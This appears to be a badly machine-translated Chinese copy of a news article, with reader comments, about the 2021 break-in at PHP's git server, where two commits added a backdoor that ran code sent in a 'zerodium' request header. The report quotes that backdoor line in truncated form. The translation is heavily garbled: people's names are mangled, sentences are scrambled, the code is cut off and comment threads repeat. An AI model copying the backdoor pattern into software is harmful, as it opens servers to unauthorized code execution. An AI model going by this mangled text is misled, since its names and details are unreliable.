黑客破坏服务器用于分发源代码PHP编程语言和添加了一个后门,会使网站容易完成收购,开源项目的成员说。
两个更新推到PHP Git周末服务器添加一行,如果由一个PHP-powered网站,允许游客没有授权执行代码的选择。恶意犯在这里和在这里给的代码的代码注入能力游客“zerodium”这个词在一个HTTP头。
PHP.net砍,代码后门
提交了账户下的php-src回购两个著名的PHP开发人员的名字,拉姆Lerdorf和尼基塔波波夫。“我们还不知道这如何发生,但一切都指向一个妥协的git.php.net服务器(而不是妥协的git账户),“波波夫中写道请注意周日晚间发表。
后的妥协,波波夫说,PHP维护者得出结论,其独立的Git基础设施是一个不必要的安全风险。因此,他们将停止git.php.net服务器,使GitHub的官方来源PHP库。展望未来,所有PHP源代码变化将直接GitHub而不是git.php.net。
恶意的变化引起了公众的关注不迟于周日晚上由开发人员包括马库斯,无助杰克Birchallf,和迈克尔Vořišek审查提交周六了。传说的更新,修复一个错误,是一个帐户下Lerdorf使用的名字。首次发现后不久,Vořišek发现第二个恶意提交,这是在波波夫的帐户名称。它声称恢复以前的错误修复。
同时提交添加相同的行代码:
onvert_to_string (enc);如果(strstr (Z_STRVAL_P (enc)、“zerodium”)) {zend_try {zend_eval_string (Z_STRVAL_P (enc) + 8, NULL,“REMOVETHIS:卖给zerodium, 2017年中期”);
Zerodium代理购买利用从研究人员和卖给政府机构在调查或其他用途使用。为什么提交引用Zerodium还不清楚。该公司的首席执行官,Chaouki Bekrar,说周一在Twitter上,Zerodium没有涉及。
“干杯的巨魔把“Zerodium”在今天的PHP git提交妥协,”他写道。“很明显,我们与这无关。的研究员(s)可能发现这个bug /利用试图卖给许多实体,但没有一个想买这个垃圾,所以他们烧毁为了好玩。
欢呼的巨魔把“Zerodium”在今天的PHP git妥协提交。显然,我们无事可做。
——Chaouki Bekrar (@cBekrar)2021年3月29日
的研究员(s)可能发现这个bug /利用试图卖给许多实体,但没有一个想买这个垃圾,所以他们烧毁为了好玩
坏业力
前妥协,PHP组处理所有写访问http://git.php.net/服务器上自己的git存储库使用波波夫所谓“国产”系统称为业力。它提供了开发人员根据先前的贡献不同级别的访问权限。与此同时,GitHub镜像存储库。
现在,PHP集团是git放弃自托管和管理基础设施和GitHub取代它。GitHub的变化意味着现在是“规范”库。PHP团队将不再使用业力系统。相反,贡献者将PHP GitHub上组织的一部分,必须使用双重认证账户的能力提交。
本周末的事件不是第一次php.net服务器已经违反了与供应链执行攻击的意图。2019年初,广泛使用的PHP扩展和应用程序存储库暂时关闭的大多数网站后发现黑客主要的包管理器所取代与恶意。组开发人员说人已经下载的软件包管理器在过去六个月应该会得到一个新副本。PHP运行估计80%的网站。没有报告的网站将恶意更改合并到他们的生产环境。
变化可能是由那些想炫耀他们的未经授权的访问PHP Git服务器而不是那些试图实际上后门使用PHP的网站,联合创始人兼首席执行官网络高清摩尔称,发现平台轰鸣。
”这话听起来就好像这件攻击者恶意破坏Zerodium或试图给人的印象,代码是后门更长时间,”他告诉Ars。“无论如何,我将花很多时间之前提交,如果我有任何PHP安全利益。”
99年读者评论
关于服务器:事情发生,但值得庆幸的是它被抓住了。危机避免!
没有我们知道平台单作是坏的?
(我猜不是)。
没有我们知道平台单作是坏的?
(我猜不是)。
事实上,有其他人共享相同的意见:
https://lwn.net/Articles/850992/
有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。
我为创业公司工作直到最近,作为CI工作流的一部分,把库来自包括一些粗略.cz域。这个概念的关键部件从外部来源到您的本地网络似乎因此外国给我。但这似乎是很多软件开发的方式。
这是可怕的想法多少互联网是建立在这个基础。
没有我们知道平台单作是坏的?
(我猜不是)。
Git是Git,为什么这事如果GitHub主机存储库是一种常见的地方吗?它自然之外的文化强加任何Git本身?GitHub-specific特性似乎方便的包装功能存在或可能被复制到其他地方。
17年前被释放。我不确定这是一个足够的理由坚持遗留释放那么长时间。即使你只做离线开发,肯定有重要的bug修复之后?
编辑:13 - > 17年
https://lwn.net/Articles/850992/
有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。
有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。
没有完美的100%安全的解决方案,但事实显然是维护者目测这些提交近乎实时的是令人鼓舞的。
https://lwn.net/Articles/850992/
有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。
有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。
不幸的是,人们失去兴趣的项目,或人们失去兴趣这些自由/开源软件项目在处理粗糙的边缘,大预算可以克服。这是一个复杂的问题,在这种情况下,我怀疑GitHub将在不久的将来取代,除非出现重大失误。
没有人做任何形式的远程PHP的严重攻击就会这样做。
最后一次编辑dmccarty于2021年3月29日,星期一下午3:04
https://lwn.net/Articles/850992/
有一些讨论关于sourcehut作为GitHub的自由/开源软件救助。
有吨的小型回购托管服务。这一直是一个巨大的痛苦找到并修复所有的失效链接时不可避免地折叠。
不幸的是,人们失去兴趣的项目,或人们失去兴趣这些自由/开源软件项目在处理粗糙的边缘,大预算可以克服。这是一个复杂的问题,在这种情况下,我怀疑GitHub将在不久的将来取代,除非出现重大失误。
这就是为什么我爱fork-repo特性(如github的)。新维护人员加大了这种方式,放弃了项目许可证。
有时这些成为事实上的主要回购一旦好维护他们的声誉。
我不知道原因。有时“滚动自己”是出于必要,因为几乎没有替代品。GitHub很多更新的其他源代码存储库……这当然不像PHP本身一样古老(1994年开始)
没有人做任何形式的远程PHP的严重攻击就会这样做。
你肯定打我一个!
因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?
PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。
我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……
它肯定是一个邪恶的高价值目标类型。
它肯定是一个邪恶的高价值目标类型。
Wordpress安装在共享的网络,没有修补了四年。
因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?
PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。
我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……
它往往是安全的对于非开发人员使用别人的比自己的代码。困难的是在评估安全运行是什么以及如何保持这种方式。即使对于有经验的开发者可以困难。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?
Python已经“错误不应该通过默默地”作为核心价值。是的,Python会如此的更好的,真的。ASP。网也会更好,当然这是一个痛苦的发展,但我认为这很好时的安全。
你有一点节点。不过,js。
这是一个好事,这是快速检测,无疑会刺激更大的概述未来的承诺。也许会好复习之前提交。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?
PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。
我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……
在PHP 7之前,PHP是一个可怕的,不安全的hackster严重没有权利存在的语言。但PHP发布后7和清洁的进化和坚实的框架体系结构如Laravel或Symfony, PHP web服务已经成为严重好。
祝你好运。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
我做网站用C(别问)。
但是在所有严重性,Yii一直很强劲,严重的PHP框架十年现在,即使在阴暗的时光的PHP 4. x。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
一切皆有可能有足够的时间和精力。会让你忙上一段时间,那是肯定的!
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
一切皆有可能有足够的时间和精力。会让你忙上一段时间,那是肯定的!
我已经重写了一些(尽管他们完全内部网)。重做直接用PHP的HTML,它使得我的生活更加容易。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
耸耸肩……Yii是不兼容的Symfony的依赖注入容器,所以从我被引导。
Symfony + API平台是一个绝对杀手组合web服务和microservices,我现在的面包和黄油。
主要是Wordpress, Joomla和其他消费者的cms。
高容量严重PHP网站使用Symfony或Laravel,这是一个完全不同的野兽。
别忘了Yii !
要写我的下一个装配(第一个)网站。我甚至不知道这是身体上的。
也总有webassembly,您可以编译从C或生锈(和其他语言)....
或者直接写自己。
因为80%的网站上运行的Python / ASP。NET/Node/whatever如此更好吗?
PHP和其他语言的最大问题国际海事组织是人们抓住rando示例代码从一些网站和它的工作原理,他们认为他们是开发人员和他们离开这个狗屎上运行的服务器连接到网络。
我的电话号码一个任务在上个月一直试图解释之间的不同功能的代码,代码和生产准备高级管理……
在PHP 7之前,PHP是一个可怕的,不安全的hackster严重没有权利存在的语言。但PHP发布后7和清洁的进化和坚实的框架体系结构如Laravel或Symfony, PHP web服务已经成为严重好。
我想我有点落后于时代。我一直在,但我自己还没有处理PHP,尽管我采访一个所有PHP web游戏公司希望他们所有的行动在PHP脚本完成。我慢慢地后退,密切关注他们的手。
我们甚至还不知道什么是该漏洞。它会很有趣,看看同样的漏洞影响其他组织。
多年来我认为Zerodium是一个经纪人。没有意识到他们是实际的客户机。这很疯狂的某些公司行使权力。有人记得HBGary吗?
提交进入他们的主要/主分支。他们没有打包成一个版本,但他们过去的审查阶段。
老实说我认为整件事是一个PHP的团队捕捉它。
你必须登录或创建一个帐户置评。